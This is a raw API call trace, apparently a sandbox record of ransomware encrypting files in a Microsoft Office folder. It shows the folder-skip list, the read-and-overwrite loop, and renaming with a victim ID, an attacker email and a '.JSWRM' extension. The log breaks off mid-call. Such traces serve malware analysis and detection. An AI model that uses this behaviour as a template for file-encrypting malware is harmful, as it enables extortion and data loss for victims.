[0113.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0113.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0113.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0113.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0113.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\drilldwn.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DRILLDWN.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\drilldwn.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0113.815] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x295718d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x295718d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x297d49a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb640, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DWGCNV.VSL", cAlternateFileName="")) returned 1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2=".") returned 1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="..") returned 1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="...") returned 1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="windows") returned -1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="recovery") returned -1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="perflogs") returned -1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="documents and settings") returned 1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="$RECYCLE.BIN") returned 1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="system volume information") returned -1 [0113.815] lstrcmpiW (lpString1="DWGCNV.VSL", lpString2="msocache") returned -1 [0113.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0113.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.VSL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV.VSL", lpUsedDefaultChar=0x0) returned 10 [0113.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0113.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0113.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.VSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV.VSL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV.VSL", lpUsedDefaultChar=0x0) returned 10 [0113.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0113.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0113.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0113.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0113.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dwgcnv.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.817] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46656) returned 1 [0113.817] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb640) returned 0x24c1d0 [0113.817] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb640, lpOverlapped=0x0) returned 1 [0113.822] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.822] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb640, lpOverlapped=0x0) returned 1 [0113.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.824] CloseHandle (hObject=0x238) returned 1 [0113.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0113.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0113.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0113.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0113.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0113.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.824] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dwgcnv.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DWGCNV.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dwgcnv.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0113.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0113.825] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3863f35, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3863f35, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3863f35, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4848, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="DWGDPRES.DLL", cAlternateFileName="")) returned 1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2=".") returned 1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="..") returned 1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="...") returned 1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="windows") returned -1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="recovery") returned -1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="perflogs") returned -1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="documents and settings") returned 1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="system volume information") returned -1 [0113.825] lstrcmpiW (lpString1="DWGDPRES.DLL", lpString2="msocache") returned -1 [0113.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDPRES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDPRES.DLL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGDPRES.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0113.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDPRES.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGDPRES.DLL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGDPRES.DLL", lpUsedDefaultChar=0x0) returned 12 [0113.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0113.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0113.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0113.826] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a2c10c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a2c10c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41af, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EADOCUMENTAPPROVAL_INIT.XSN", cAlternateFileName="EADOCU~2.XSN")) returned 1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2=".") returned 1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="..") returned 1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="...") returned 1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="windows") returned -1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="recovery") returned -1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="perflogs") returned -1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="documents and settings") returned 1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="$RECYCLE.BIN") returned 1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="system volume information") returned -1 [0113.826] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_INIT.XSN", lpString2="msocache") returned -1 [0113.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0113.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_INIT.XSN", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0113.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0113.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_INIT.XSN", cchWideChar=27, lpMultiByteStr=0x240ef8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EADOCUMENTAPPROVAL_INIT.XSN", lpUsedDefaultChar=0x0) returned 27 [0113.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0113.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0113.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_INIT.XSN", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0113.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0113.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_INIT.XSN", cchWideChar=27, lpMultiByteStr=0x241010, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EADOCUMENTAPPROVAL_INIT.XSN", lpUsedDefaultChar=0x0) returned 27 [0113.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0113.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0113.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0113.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0113.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_INIT.XSN" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_init.xsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.827] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16815) returned 1 [0113.827] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x41a0) returned 0x24c1d0 [0113.828] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x41a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x41a0, lpOverlapped=0x0) returned 1 [0113.831] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.831] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x41a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x41a0, lpOverlapped=0x0) returned 1 [0113.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.831] CloseHandle (hObject=0x238) returned 1 [0113.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0113.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0113.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0113.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0113.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0113.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0113.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.832] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_INIT.XSN" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_init.xsn"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_INIT.XSN.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_init.xsn.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0113.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0113.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0113.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0113.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0113.832] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99b9a24, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99b9a24, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5101, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="EADOCUMENTAPPROVAL_REVIEW.XSN", cAlternateFileName="EADOCU~1.XSN")) returned 1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2=".") returned 1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="..") returned 1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="...") returned 1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="windows") returned -1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="recovery") returned -1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="perflogs") returned -1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="documents and settings") returned 1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="$RECYCLE.BIN") returned 1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="system volume information") returned -1 [0113.833] lstrcmpiW (lpString1="EADOCUMENTAPPROVAL_REVIEW.XSN", lpString2="msocache") returned -1 [0113.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0113.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_REVIEW.XSN", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0113.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0113.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_REVIEW.XSN", cchWideChar=29, lpMultiByteStr=0x240f70, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EADOCUMENTAPPROVAL_REVIEW.XSN", lpUsedDefaultChar=0x0) returned 29 [0113.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0113.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0113.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_REVIEW.XSN", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0113.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0113.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EADOCUMENTAPPROVAL_REVIEW.XSN", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EADOCUMENTAPPROVAL_REVIEW.XSN", lpUsedDefaultChar=0x0) returned 29 [0113.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: 